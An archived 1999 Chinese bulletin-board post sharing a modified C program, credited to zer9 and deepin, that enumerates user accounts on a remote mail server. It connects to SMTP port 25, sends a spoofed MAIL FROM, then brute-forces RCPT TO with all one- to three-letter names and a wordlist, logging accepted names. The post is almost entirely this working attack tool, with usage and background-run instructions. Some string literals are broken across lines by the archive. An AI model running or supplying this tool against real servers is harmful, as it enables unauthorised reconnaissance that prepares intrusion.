发信人: deepin()
整理人: williamlong(1999-05-14 17:16:41), 站内信件
|
对zer9的rcpt.c小小修改了一下,zer9不会介意吧? :-)
虽然用暴力法,不过也不要太暴力了,呵呵.
所以我把循环改成了3位,主要靠用户名字典来猜,其实命中率也是
很高的,不然按照zer9的一秒猜一个就算是4位,也要130个小时虽然
可以用多线程加快速度,可惜我还不会写 :( 本来还想把rcpt.log
整理输出成用户名文件,可惜我太懒了 :))RedHat5.2下通过.
/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd
* thr0ugh "rcpt" gain rem0te server's user list
* by
* zer9
* Small modify by deepin
* [email protected]
* [email protected]
* test on:slackware 2.0.34&irix6.4&Redhat5.2
* cc rcpt.c -o rcpt
* 后台运行:nohup ./rcpt <Target>&
*thanks zer9 ,he write the main program and i only modify a li
tter :-)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <signal.h>
#include <ctype.h>
#include <arpa/inet.h>
#define SMTPPORT 25
#define VERSION "0.081"
#define LogFile "./rcpt.log"
#define TIMEOUT 200
#define SleepTime 1
int ver(void);
int look_up(int sock,char *string,char *buff);
int writeln(int sock,char *string)
{
char sendbuf[100];
bzero(sendbuf,100);
strncpy(sendbuf,string,strlen(string));
strncat(sendbuf,"\n",1);
send(sock,sendbuf,strlen(sendbuf),0);
return 0;
}
int s;
FILE *fp,*wfp;
int main(int argc,char *argv[])
{
struct sockaddr_in sin;
struct in_addr Target;
struct hostent *he;
char j;
char recvbuf[1000],rcpt[200],a[8],hello_Target[500],word[10];
if(argc!=3)
{
printf("Rcpt %s by zer9[FTT]&deepin mailto: [email protected]
\n",VERSION);
printf("Usage: %s <Target> <WordlistFile> \n",argv[0]);
return -1;
}
if((fp=fopen(LogFile,"a+"))==NULL)
{
perror("fopen");
return -1;
}
if((wfp=fopen(argv[2],"r"))==NULL)
{
perror("fopen");
return -1;
}
if((he=gethostbyname(argv[1]))!=NULL)
{
bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length);
}
else
Target.s_addr=inet_addr(argv[1]);
if(Target.s_addr==-1)
{
perror("gethostbyname");
return -1;
}
ver();
fprintf(fp,"@Target: %s ",argv[1]);
if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
fprintf(fp,"==================================================
=======
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title */
{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT */
{
perror("no RCPT command. exit...");
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"mail from: [email protected]"); /*ma1l fr0m: zer9@fb
i.gov*/
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");
/* 1bits */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c",a[0]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 2 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/*Read from WordsList */
fscanf(wfp,"%s",word);
while(!feof(wfp))
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
strncat(rcpt,word,strlen(word));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
fscanf(wfp,"%s",word);
}
fprintf(fp,"==================================================
=======
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
close(s);
fclose(wfp);
fclose(fp);
return 0;
}
int look_up(int sock,char *string,char *buff)
{
if(strstr(buff,"ent ok")!=NULL)
/* at sendmail 8.8.7: Recipient ok*/
fprintf(fp,"%s",buff);
fflush(fp);
return 0;
}
int ver(void)
{
fprintf(fp,"\n###############################\n");
fprintf(fp,"Rcpt %s by zer9[FTT]&deepin mailto: [email protected]
om\n",VERSION)
;
return 0;
}
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.32.93]
|
|